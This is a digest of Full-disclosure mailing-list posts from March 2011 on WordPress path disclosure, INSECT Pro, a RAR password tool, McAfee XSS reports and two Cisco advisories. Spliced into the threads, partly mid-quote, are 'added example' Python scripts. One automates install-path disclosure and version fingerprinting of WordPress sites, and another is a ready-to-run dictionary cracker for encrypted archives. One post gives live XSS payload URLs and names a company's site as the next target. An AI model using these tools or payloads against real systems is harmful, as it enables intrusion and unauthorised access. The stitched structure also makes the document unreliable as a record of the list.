wp-includes\feed-atom-comments.php
wp-includes\feed-atom.php
wp-includes\feed-rdf.php
wp-includes\feed-rss.php
wp-includes\feed-rss2-comments.php
wp-includes\feed-rss2.php
wp-includes\general-template.php
wp-includes\js\tinymce\langs\wp-langs.php
wp-includes\js\tinymce\plugins\spellchecker\classes\EnchantSpell.php
wp-includes\js\tinymce\plugins\spellchecker\classes\GoogleSpell.php
wp-includes\js\tinymce\plugins\spellchecker\classes\PSpell.php
wp-includes\js\tinymce\plugins\spellchecker\classes\PSpellShell.php
wp-includes\js\tinymce\plugins\spellchecker\config.php
wp-includes\js\tinymce\wp-mce-help.php
wp-includes\kses.php
wp-includes\l10n.php
wp-includes\media.php
wp-includes\ms-default-constants.php
wp-includes\ms-default-filters.php
wp-includes\ms-functions.php
wp-includes\ms-settings.php
wp-includes\nav-menu-template.php
wp-includes\post.php
wp-includes\query.php
wp-includes\registration-functions.php
wp-includes\rss-functions.php
wp-includes\rss.php
wp-includes\script-loader.php
wp-includes\shortcodes.php
wp-includes\taxonomy.php
wp-includes\template-loader.php
wp-includes\theme-compat\comments-popup.php
wp-includes\theme-compat\comments.php
wp-includes\theme-compat\footer.php
wp-includes\theme-compat\header.php
wp-includes\theme-compat\sidebar.php
wp-includes\theme.php
wp-includes\update.php
wp-includes\user.php
wp-includes\vars.php
wp-includes\widgets.php
wp-includes\wp-db.php
wp-includes\wp-diff.php
wp-settings.php

That's some 30%-40% of all Wordpress files (depending on Wordpress install).

I considered publishing this formally but...

http://codex.wordpress.org/Security_FAQ
See the 5th clause.

If they can't be bothered with proper coding practices, I won't bother
arguing what the meaning behind optimal security is either.
For the record, keep in mind that hiding the said errors from output
still doesn't stop them from being logged in the infamous error_log,
which of course can be fixed by (un)setting yet another config.

Seems useless to point out that security is about not shooting at your
own feet as opposed to doing so and mending them later on.

EOR

Chris.



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread runlvl
The INSECT Pro version hosted on that site is really old; from what I
see it is version 1.1 and is not an official version. On the other
hand, INSECT Pro 2.5 is free and we only ask for a donation to show
interest. The amount of the donation is not fixed.

We want to say thanks to the community that allows us to develop
further, and thanks to you we can afford decent hosting so you can
download updates directly from our site.

Just as there are trolls on this list going around insulting
everyone, there are many people who are worthwhile, and that is why we
continue learning and developing for this project.

Greetings!
Juan Sacco

 --
_
Insecurity Research - Security auditing and testing software
Web: http://www.insecurityresearch.com
Insect Pro 2.5 was released, stay tuned

2011/3/30 Quentin Ducas quentin@gmail.com:
 It is still available at http://insectpro.highprofilesite.com/
 Free, no donation required.

 Quentin





Re: [Full-disclosure] HTB22905: Path disclosure in Wordpress

2011-03-30 Thread Christian Sciberras
By the way, I didn't see this mentioned anywhere (yet); since there
are so many unprotected files, one can easily detect the wordpress
version by comparing error line numbers.





On Wed, Mar 30, 2011 at 4:39 PM, Christian Sciberras uuf6...@gmail.com wrote:
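What the post describes, requesting the include files directly and reading the install path out of PHP's fatal error, together with the follow-up's point that the line number in that error differs between releases, can be automated end to end. The script below is an added example, not code from HTB22905 or from WordPress: it parses PHP error output in both the HTML form and the plain-text form, recovers the install directory by stripping the requested relative path from the disclosed absolute path, and intersects (file, line) observations against a fingerprint table. The sample responses, their error texts and every line number in FINGERPRINTS are constructed for the example; against a real install, populate the table from the releases you want to tell apart and pass a `fetch` that performs the HTTP requests.

```python
import re

# Added example, not code from the advisory or from WordPress. All sample
# responses and every line number in FINGERPRINTS are constructed.

# Matches both PHP error formats:
#   <b>Fatal error</b>:  msg in <b>/path/file.php</b> on line <b>14</b>
#   PHP Fatal error:  msg in /path/file.php on line 14
PHP_ERROR = re.compile(
    r"(?P<level>Fatal error|Parse error|Warning|Notice)(?:</b>)?:\s*"
    r"(?P<msg>.*?)\s+in\s+(?:<b>)?"
    r"(?P<path>(?:[A-Za-z]:\\|/)[^<\r\n]+?)(?:</b>)?\s+on line\s+(?:<b>)?(?P<line>\d+)",
    re.S,
)


def parse_php_error(body: str):
    """First PHP error in a response body, or None if nothing leaked."""
    m = PHP_ERROR.search(body)
    if not m:
        return None
    return {"level": m["level"], "message": m["msg"],
            "path": m["path"], "line": int(m["line"])}


def install_root(disclosed_path: str, requested_file: str):
    """Install directory = disclosed absolute path minus the file we asked
    for. Accepts either separator (Windows hosts answer with backslashes)."""
    disclosed = disclosed_path.replace("\\", "/")
    requested = requested_file.replace("\\", "/").lstrip("/")
    if not disclosed.endswith("/" + requested):
        return None
    return disclosed[: -len(requested) - 1] or "/"


# (relative file, line reported in the fatal error) -> releases that produce it.
# Hypothetical values; build the real table by requesting the same files
# against known releases.
FINGERPRINTS = {
    ("wp-includes/cache.php", 14): {"3.0", "3.0.1"},
    ("wp-includes/cache.php", 17): {"3.1"},
    ("wp-content/themes/twentyten/404.php", 13): {"3.0", "3.0.1", "3.1"},
}


def guess_version(observations) -> list:
    """Intersect candidate releases over (file, line) pairs; files with no
    table entry are ignored, an empty intersection means the table is stale."""
    candidates = None
    for rel, line in observations:
        versions = FINGERPRINTS.get((rel.replace("\\", "/"), line))
        if versions is None:
            continue
        candidates = set(versions) if candidates is None else candidates & versions
    return sorted(candidates) if candidates else []


def probe(fetch, files):
    """fetch(relative_file) -> response body. Returns the set of install
    roots seen and the (file, line) pairs for every file that leaked."""
    roots, observations = set(), []
    for rel in files:
        err = parse_php_error(fetch(rel))
        if err is None:          # display_errors off, or the file is guarded
            continue
        rel_norm = rel.replace("\\", "/")
        observations.append((rel_norm, err["line"]))
        root = install_root(err["path"], rel_norm)
        if root:
            roots.add(root)
    return roots, observations


# Constructed responses standing in for a live target (file paths taken from
# the post's list, error texts and line numbers made up).
SAMPLE_RESPONSES = {
    "wp-includes\\cache.php":
        "<br />\n<b>Fatal error</b>:  Call to undefined function wp_cache_add() "
        "in <b>/var/www/html/wp-includes/cache.php</b> on line <b>14</b><br />\n",
    "wp-content\\themes\\twentyten\\404.php":
        "<br />\n<b>Fatal error</b>:  Call to undefined function get_header() "
        "in <b>/var/www/html/wp-content/themes/twentyten/404.php</b> on line <b>13</b><br />\n",
    "wp-includes\\kses.php": "",   # a host with display_errors=Off answers with a blank page
}


def demo():
    roots, obs = probe(lambda rel: SAMPLE_RESPONSES.get(rel, ""), SAMPLE_RESPONSES)
    return sorted(roots), obs, guess_version(obs)


if __name__ == "__main__":
    print(demo())
```

The blank response for kses.php is the case the post's last paragraph raises: with display_errors off the probe learns nothing, while the same fatal error still lands in the server's error_log unless log_errors is off as well. Version fingerprinting only works when enough files leak to narrow the intersection, so feed `probe` the full list from the post rather than one or two files.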

Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Benji
The amount of the donation is not fixed.


Can I make a 0 euro donation?



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread nix
 The amount of the donation is not fixed.


 Can I make a 0 euro donation?



Are you bored or stupid, or both?




Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-30 Thread Tim
  why do we need an installer then? Distribute that tool as a single
  executable.
 
 Because without the installer, it can't try to monetize the install by 
 installing search toolbars! (It's nice enough to continue the install if you 
 reject their terms, though.)
 
 
 On 2011-03-29, at 13:13, Jo Galara wrote:
  How does it work? Bruteforce?
 
 Yes, but... well, JAD does a better job of explaining than I possibly could:
 
   Runtime rt = Runtime.getRuntime();
  
   String str = "7z.exe x ";
   str = str + "\"" + _filepath + "\" ";
   str = str + "-p\"" + pwd + "\" ";
   str = str + "-o\"" + _destpath + "\"";
   str = str + " -y";
  
   System.out.println(str);
  
   Process p = rt.exec(str);
   p.waitFor();
  
   if (p.exitValue() == 0)
   {
       ret = true;
   }


That's funny (i.e. pathetic).

A quick search of the tool's website doesn't reveal any links to the
7-zip website.  I'm not going to bother to download this tool, since a
1-line shell script would accomplish the same thing, but if 7-zip
isn't linked to in the accompanying documentation, then that would be
a violation of the LGPL.  From 7-zip's FAQ:

  Can I use the EXE or DLL files from 7-Zip in a Commercial Application?

  Yes, but you are required to specify in your documentation (1) that
  you used parts of the 7-Zip program, (2) that 7-Zip is licensed under
  the GNU LGPL license and (3) you must give a link to www.7-zip.org,
  where the source code can be found.


tim

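Stripped of the installer and the GUI, the decompiled loop quoted above is a dictionary attack driven by 7-Zip's exit status. The script below is an added example, not RarPasswordUnlocker's code: it applies a few mangling rules to each wordlist entry, hands every candidate to `7z t` as its own argv element (no shell, so odd characters in a guess cannot break the command) and stops at the first exit status 0. It assumes a `7z` binary on PATH and takes an injectable `runner` so the loop can be exercised without an archive; the wordlist, the mangling rules and the fake archive are constructed for the example. Every guess costs a process spawn, which is the "take forever" Nicolai describes for anything but short or predictable passwords.

```python
import subprocess
import sys

# Added example, not the RarPasswordUnlocker code. Wordlist, mangling rules
# and the fake runner are constructed; the real runner expects `7z` on PATH.

SUFFIXES = ("", "1", "123", "!")   # assumed mangling rules, deliberately short


def mangle(word: str):
    """Yield case variants of a word with each suffix, without repeats."""
    seen = set()
    for base in (word, word.capitalize(), word.upper()):
        for suffix in SUFFIXES:
            cand = base + suffix
            if cand not in seen:
                seen.add(cand)
                yield cand


def run_7z(archive: str, password: str) -> int:
    """Exit status of `7z t` (test the archive) with a candidate password.
    7-Zip exits 0 when every entry tests clean and non-zero otherwise (a wrong
    password surfaces as a data error). -y suppresses prompts so a bad guess
    cannot block the loop; the argv form passes the candidate through verbatim."""
    proc = subprocess.run(
        ["7z", "t", "-y", "-p" + password, archive],
        stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
    )
    return proc.returncode


def crack(archive: str, words, runner=run_7z):
    """Try every mangled candidate; return (password, attempts) or (None, attempts)."""
    attempts = 0
    for word in words:
        for cand in mangle(word):
            attempts += 1
            if runner(archive, cand) == 0:
                return cand, attempts
    return None, attempts


def read_wordlist(path: str):
    """One candidate per line; blank lines skipped."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            word = line.rstrip("\r\n")
            if word:
                yield word


# Constructed stand-in for 7z so the loop can be run without an archive.
FAKE_ARCHIVES = {"secret.rar": "Winter123"}


def fake_runner(archive: str, password: str) -> int:
    return 0 if FAKE_ARCHIVES.get(archive) == password else 2


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit("usage: rarcrack.py ARCHIVE WORDLIST")
    found, tried = crack(sys.argv[1], read_wordlist(sys.argv[2]))
    print(f"{tried} attempts, password: {found!r}")
```

Against a real archive, run it as `python rarcrack.py archive.rar words.txt`; `7z t` reads the whole archive per attempt, so for large archives point it at a small encrypted member or use a dedicated cracker with native RAR support instead.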


Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Benji
Neither, I was curious as to what he'd say, and I was pleasantly
surprised (offered to send me a copy).

Calm down kid.

On 3/30/11, n...@myproxylists.com n...@myproxylists.com wrote:
 The amount of the donation is not fixed.


 Can I make a 0 euro donation?



 Are you bored or stupid, or both?






Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Let's see here... As an ethical hacker group, you don't like being criticized 
by someone as engaging in illegal activities, so you announce on a public site 
that you are going to attack the company?   Brilliant. 
t


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
Hacker Group
Sent: Wednesday, March 30, 2011 5:44 AM
To: Pablo Ximenes
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=content&id=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=content&id=;; alert(1); //


You guys know our disclosed issues are very simple and can easily be found
through viewing HTML/JS source code and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
http://www.cenzic.com/company/management/khera/,  according to Network World 
News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
see how strong the Kung-Fu of Cenzic HailStorm scanner is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd





Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Christian Sciberras
Thor, that's just a marketing adjective.

Just like when you're asked to buy authentic replica r0lex watches.

Cheers,
Chris.




On Wed, Mar 30, 2011 at 5:22 PM, Thor (Hammer of God)
t...@hammerofgod.com wrote:
 Let's see here... As an ethical hacker group, you don't like being 
 criticized by someone as engaging in illegal activities, so you announce on a 
 public site that you are going to attack the company?   Brilliant.
 t



Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Steven Pinkham
runlvl wrote:
  The INSECT Pro version hosted on that site is really old, from what I
  see is the version 1.1 and is not an official version, on the other
  side.

The version made available is older (2.0 version, not 1.1 as you claim), 
but it is an official version, or at least what you gave me as an 
official download.  There is also a recompressed version with the same 
content for a smaller download size for people that want that.
As I said before, I'll happily update the version hosted there to the 
newest version if you allow it.  My download password stopped working at 
the time of the next release, and emails about it have been ignored.

  INSECT Pro 2.5 is free and we only ask for a donation to show
  interest. The amount of the donation is not fixed.

Please, let's not start this up again.  Your page clearly says you are 
buying a license, and has removed all comments about it being free.  The 
licenses of the software you include (Metasploit and Skipfish) allow 
this, and there's no benefit to you making the claim of the software 
being free.  You may or may not offer some licenses gratis, but that's 
different from the software being free in the sense that most people 
understand.  If it's free, I'll happily host newer versions for free 
download for everyone.  Otherwise, stick with the license language you 
have on your website.

To be clear, I have no problem with you offering licenses for sale, 
offering licenses for donations, or making software freely available. 
Just do the one you are claiming to do please.
-- 
  | Steven Pinkham, Security Consultant|
  | http://www.mavensecurity.com   |
  | GPG public key ID CD31CAFB |




Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool

2011-03-30 Thread Chris M
Maybe you can fix my login/password for insecurityresearch.com as per my
earlier mail.

Customer Service & Marketing, right? :p

On Wed, Mar 30, 2011 at 3:44 PM, runlvl run...@gmail.com wrote:

 The INSECT Pro version hosted on that site is really old, from what I
 see is the version 1.1 and is not an official version, on the other
 side. INSECT Pro 2.5 is free and we only ask for a donation to show
 interest. The amount of the donation is not fixed.

 We want to say thanks to the community that allows us to further
 develop and thanks to you we can afford a decent hosting so you can
 download updates directly from our site.

 Just as there are trolls on this list going around and insulting
 everyone, too many people are worthwhile and that is why we continue
 learning and developing for this project.

 Greetings!
 Juan Sacco

  --
 _
 Insecurity Research - Security auditing and testing software
 Web: http://www.insecurityresearch.com
 Insect Pro 2.5 was released, stay tuned

 2011/3/30 Quentin Ducas quentin@gmail.com:
  It is still available at http://insectpro.highprofilesite.com/
  Free, no donation required.
 
  Quentin
 
 
  2011/3/30 runlvl run...@gmail.com:
  Insecurity Research is happy to announce the release of version 2.5,
  get it now while it is still hot!
 
  Insect Pro 2.5 is a penetration security auditing and testing software
  solution designed to allow organizations of all sizes to mitigate,
  monitor and manage the latest security threats and vulnerabilities.
 
  We’re always working to improve Insect Pro and now the users obtain
  a new feature: A fully automated active web application security
  reconnaissance tool.
 
  Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
 
  We invite you to take a visual tour where you can find screenshots and
  videos, visit us now at http://www.insecurityresearch.com
 
  There is no fixed price to get a copy, you can obtain the full version
  by making a minimum donation to keep us coding.
 
  We are really thankful with the community!
 
  Get it now from: http://www.insecurityresearch.com
 
  Juan Sacco
 
  --
  _
  Insecurity Research - Security auditing and testing software
  Web: http://www.insecurityresearch.com
  Insect Pro 2.5 was released, stay tuned
 
 





-- 
 I’m a hot-wired, heat seeking, warm-hearted cool customer, voice activated
and bio-degradable. I interface with my database, my database is in
cyberspace, so I’m interactive, I’m hyperactive and from time to time I’m
radioactive.

[Full-disclosure] Cisco Security Advisory: Cisco Network Access Control Guest Server System Software Authentication Bypass Vulnerability

2011-03-30 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco Network Access Control Guest Server
System Software Authentication Bypass Vulnerability

Advisory ID: cisco-sa-20110330-nac

Revision 1.0

For Public Release 2011 March 30 1600 UTC (GMT)
+-

Summary
===

Cisco Network Access Control (NAC) Guest Server system software
contains a vulnerability in the RADIUS authentication software that
may allow an unauthenticated user to access the protected network.

Cisco has released free software updates that address this
vulnerability.

This advisory is posted at:
http://www.cisco.com/warp/public/707/cisco-sa-20110330-nac.shtml

Affected Products
=

Cisco NAC Guest Server provides guest policy enforcement to Cisco NAC
appliances and Cisco Wireless LAN Controllers, where guest policies
are enforced.

Vulnerable Products
+--

This vulnerability affects all versions of NAC Guest Server software
prior to software version 2.0.3. The software version is displayed on
the login page of the web server.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

The Cisco NAC Guest Server system software contains a vulnerability
in the configuration file of the RADIUS authentication software. This
misconfiguration may allow an unauthenticated user to access the
protected network. This vulnerability may result in authentication
bypass without requiring a valid username or password.

This vulnerability is documented in Cisco Bug ID CSCtj66922 (
registered customers only) and has been assigned Common
Vulnerabilities and Exposures (CVE) ID CVE-2011-0963.

Vulnerability Scoring Details
+

Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding
CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtj66922 -  Authentication Bypass Vulnerability

CVSS Base Score - 5.0
Access Vector -Network
Access Complexity -Low
Authentication -   None
Confidentiality Impact -   Partial
Integrity Impact - None
Availability Impact -  None

CVSS Temporal Score - 4.1
Exploitability -   Functional
Remediation Level -Official-Fix
Report Confidence -Confirmed

Impact
==

Successful exploitation of the vulnerability may allow unauthorized
users to access the protected network.

Software Versions and Fixes
===

When considering software upgrades, also consult 
http://www.cisco.com/go/psirt and any subsequent advisories to determine 
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

Software versions prior to 2.0.3 are affected by this vulnerability.
Fixed software and workarounds are available for all NAC Guest Server
devices.

Workarounds
===

It is possible to modify the RADIUS configuration file of the Cisco
NAC Guest Access Server to eliminate the potential for authentication
bypass. The following commands back up and modify the RADIUS
configuration file and restart the RADIUS daemon so that it reads the
new configuration file.

The configuration file may be modified by running the following
command from the command-line interface (CLI) of the device:

# cp /etc/raddb/radiusd.conf /etc/raddb/radiusd.conf.orig
# sed -i 's/php -f/php/g' /etc/raddb/radiusd.conf
# service radiusd restart

Obtaining Fixed Software
========================

Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets
they have purchased. By installing

[Full-disclosure] Cisco Security Advisory: Cisco Secure Access Control System Unauthorized Password Change Vulnerability

2011-03-30 Thread Cisco Systems Product Security Incident Response Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Cisco Security Advisory: Cisco Secure Access Control System Unauthorized
Password Change Vulnerability

Advisory ID: cisco-sa-20110330-acs

Revision 1.0

For Public Release 2011 March 30 1600 UTC (GMT)

+-

Summary
===

A vulnerability exists in some Cisco Secure Access Control System
(ACS) versions that could allow a remote, unauthenticated attacker to
change the password of any user account to any value without
providing the account's previous password. Successful exploitation
requires the user account to be defined on the internal identity
store.

This vulnerability does not allow an attacker to perform any other
changes to the ACS database. That is, an attacker cannot change
access policies, device properties, or any account attributes except
the user password.

Cisco has released free software updates that address this
vulnerability. There is no workaround for this vulnerability.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110330-acs.shtml.

Affected Products
=

Vulnerable Products
+--

The following Cisco Secure ACS versions are affected by this
vulnerability:

  * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any
combination of these patches) installed and without patch 6 or
later installed
  * Cisco Secure ACS version 5.2 without any patches installed
  * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these
patches) installed and without patch 3 or later installed

The previous list applies to both the hardware appliance and the
software-only versions of the product.

The following methods can be used to determine which version of the
Cisco Secure ACS is installed:

  * From the Cisco Secure ACS command-line interface (CLI), issue the
show version command, as shown in the following example:

acs51a/admin# show version

Cisco Application Deployment Engine OS Release: 1.2
ADE-OS Build Version: 1.2.0.152
ADE-OS System Architecture: i386

Copyright (c) 2005-2009 by Cisco Systems, Inc.
All rights reserved.
Hostname: acs51a


Version information of installed applications
-


Cisco ACS VERSION INFORMATION
-
Version : 5.1.0.44.6
Internal Build ID : B.2347
Patches :
5-1-0-44-3
5-1-0-44-6

acs51a/admin#

  * On the main login page of the Cisco Secure ACS web-based
interface, the version information is displayed on the left side
of the screen.
  * From the Cisco Secure ACS web-based interface, log in and click
the About link at the top right corner of the screen.

Cisco Secure ACS version 5.1 will identify itself as version 5.1.0.44,
whereas Cisco Secure ACS version 5.2 will identify itself as version
5.2.0.26. The presence of an additional digit after the version number
indicates the highest patch level installed. For example, a version
number of 5.1.0.44.3 indicates Cisco Secure ACS version 5.1 with up to
patch 3 installed. The absence of any additional digit after the version
string indicates a Cisco Secure ACS version with no patches installed.

Products Confirmed Not Vulnerable
+

The following Cisco Secure ACS versions are not affected by this
vulnerability:

  * Any Cisco Secure ACS version prior to version 5.1
  * Cisco Secure ACS version 5.1 without any patches installed, or
with patch 6 or later installed
  * Cisco Secure ACS version 5.1 with patch 1 or 2 (or both of these
patches) installed
  * Cisco Secure ACS version 5.1 with patch 3, 4, or 5 (or any
combination of these patches) installed, as long as patch 6 or
later is also installed
  * Cisco Secure ACS version 5.2 with patch 1 or 2 (or both of these
patches) installed, as long as patch 3 or later is also installed
  * Cisco Secure ACS version 5.2 with patch 3 or later installed

The previous list applies to both the hardware appliance and the
software-only versions of the product.

No other Cisco products are currently known to be affected by this
vulnerability.
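As an added example (not Cisco's code and not part of either advisory), the following Python script turns the version rules stated in the NAC Guest Server advisory above (all releases prior to 2.0.3 affected) and in this ACS advisory's affected and not-affected lists into a check an administrator can run against a recorded `show version` transcript before deciding whether a device needs the fix. The sample transcript is constructed to match the shape of the advisory's example output; treating the `Patches :` list as overriding the fifth digit of the `Version :` line, and treating releases the advisory does not list as not affected, are assumptions of this example.

```python
import re
from typing import Optional, Tuple

# Constructed sample in the shape of the advisory's `show version` example
# (hostname, build id and patch list are illustrative, not captured output).
SAMPLE_SHOW_VERSION = """\
acs51a/admin# show version

Cisco Application Deployment Engine OS Release: 1.2
ADE-OS Build Version: 1.2.0.152
ADE-OS System Architecture: i386

Cisco ACS VERSION INFORMATION
-----------------------------
Version : 5.1.0.44.6
Internal Build ID : B.2347
Patches :
5-1-0-44-3
5-1-0-44-6

acs51a/admin#
"""


def parse_acs_version(version: str) -> Tuple[int, int, Optional[int]]:
    """Split '5.1.0.44.3' into (major, minor, patch).

    5.1 identifies itself as 5.1.0.44 and 5.2 as 5.2.0.26; a fifth
    component is the highest patch level installed, and its absence
    means no patches are installed."""
    parts = [int(p) for p in version.strip().split(".")]
    if len(parts) < 2:
        raise ValueError(f"unrecognised ACS version string: {version!r}")
    patch = parts[4] if len(parts) >= 5 else None
    return parts[0], parts[1], patch


def acs_vulnerable(version: str) -> bool:
    """Apply the affected/not-affected lists of cisco-sa-20110330-acs."""
    major, minor, patch = parse_acs_version(version)
    if (major, minor) < (5, 1):
        return False                      # any release prior to 5.1
    if (major, minor) == (5, 1):
        # Affected with patch 3, 4 or 5 installed unless patch 6 or later is
        # also installed; the version string shows the highest patch level.
        return patch is not None and 3 <= patch <= 5
    if (major, minor) == (5, 2):
        # Affected unpatched or with only patch 1 and/or 2; fixed from patch 3.
        return patch is None or patch < 3
    return False                          # releases the advisory does not list (assumption)


def acs_version_from_show_version(output: str) -> str:
    """Derive the effective version (base + highest patch) from CLI output.

    Assumption of this example: the 'Patches :' list is authoritative for the
    highest patch level and overrides the fifth digit of the 'Version :' line."""
    match = re.search(r"^Version\s*:\s*([\d.]+)\s*$", output, re.MULTILINE)
    if not match:
        raise ValueError("no 'Version :' line found in show version output")
    version = match.group(1)
    patches = [int(p) for p in
               re.findall(r"^\d+-\d+-\d+-\d+-(\d+)\s*$", output, re.MULTILINE)]
    if patches:
        base = ".".join(version.split(".")[:4])
        version = f"{base}.{max(patches)}"
    return version


def nac_guest_server_vulnerable(version: str) -> bool:
    """cisco-sa-20110330-nac: all NAC Guest Server releases prior to 2.0.3."""
    return tuple(int(p) for p in version.strip().split(".")) < (2, 0, 3)


if __name__ == "__main__":
    effective = acs_version_from_show_version(SAMPLE_SHOW_VERSION)
    print(f"ACS effective version {effective}: "
          f"{'AFFECTED' if acs_vulnerable(effective) else 'not affected'}")
    for v in ("5.1.0.44.3", "5.2.0.26", "5.2.0.26.3"):
        print(f"ACS {v}: {'AFFECTED' if acs_vulnerable(v) else 'not affected'}")
    for v in ("2.0.2", "2.0.3"):
        print(f"NAC Guest Server {v}: "
              f"{'AFFECTED' if nac_guest_server_vulnerable(v) else 'not affected'}")
```

The sample transcript shows why the patch list matters: a 5.1 box that once had patch 3 installed is in the affected set only until patch 6 or later is added, and the highest entry under `Patches :` is what settles that.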

Details
===

Cisco Secure ACS operates as a centralized RADIUS and TACACS+ server,
combining user authentication, user and administrator device access
control, and policy control into a centralized identity networking
solution.

A vulnerability exists in some Cisco Secure ACS versions that could
allow a remote, unauthenticated attacker to change the password of
any user account to any value without providing the account's
previous password. Successful exploitation requires the user account
to be defined on the internal identity store.

This vulnerability cannot be used to change the password for the
following types of users accounts:

  * User accounts that are defined on external identity

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Jeffrey Walton
On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
li...@yehg.net wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.
Too funny. I wonder if Aaron Barr is consulting for Cenzic.

Jeff

 [SNIP]



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears
Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that 
matter), if anyone should understand that a XSS should really only be construed 
a 'criminal act' if it's indeed used to attack someone. If a group is taking 
the time out of their day to find and disclose issues to Mcafee, they should 
probably be thankful. What about finding a vulnerability in Mcafee's virus 
scanner? Could that be construed as a 'criminal act' if they disclose it? Where 
do you draw the line?

Basically this sort of thing pushes the community into silence until something 
truly criminal happens. I'm not saying give anyone massive amounts of credit 
for publishing a few XSS bugs (because there's millions of them out there), but 
don't label them as a criminal for trying to help. That's just idiotic IMO.

If you run an enterprise level solution for antivirus AND web vulnerability 
testing, the community understands that it's a process not unlike any other. 
There will be bugs, but it only demolishes the image of Mcafee to see them 
handle it like this in particular. If they would have been appreciative about 
it, and promptly fixed their website (or at the very least maintained friendly 
contact) this incident would have pretty much gone un-noticed.

Look at LastPass as an example. 

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They had someone poking at their site, who managed to find a XSS bug using CRLF 
injections. They were appreciative of the find, 2.5 hrs later the issue was 
fixed, and there was that blog post about exactly what they were going to do 
about it. They took full responsibility for the fact that THEIR coding was to 
blame, and basically said 'This is what happened, and this is why it will 
probably never happen again'. This spoke hugely to me (as I'm sure it did the 
rest of the community) because it shows a company that's willing to admit it 
made a mistake, as opposed to sitting on their haunches and blaming people for 
looking for these sorts of bugs. Oh and not every customer of their service has 
to pay massive licensing fees, as there's a free version as well. In my mind at 
least this equates to a company that cares more about their customers that 
don't pay a single dime, than a company who forces people to pay massive 
amounts of coin for shaky automated scanning and services. That's just the way 
I see it though. 

Someone's gotta tell the emperor he has no clothes on.

Ryan

- Original Message -
From: Jeffrey Walton noloa...@gmail.com
To: YGN Ethical Hacker Group li...@yehg.net
Cc: full-disclosure full-disclosure@lists.grok.org.uk
Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
li...@yehg.net wrote:
 According to xssed.com,  there are two remaining XSS issues:

 https://kb.mcafee.com/corporate/index?page=contentid=;; alert(1); //
 https://kc.mcafee.com/corporate/index?page=contentid=;; alert(1); //


 You guys know our disclosed issues are very simple and can easily be
 found through viewing HTML/JS source codes and simple Google Hacking
 (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

 However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
 http://www.cenzic.com/company/management/khera/,  according to Network
 World News editor - Ellen Messmer.  Thus, the next target is Cenzic
 web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
 is.
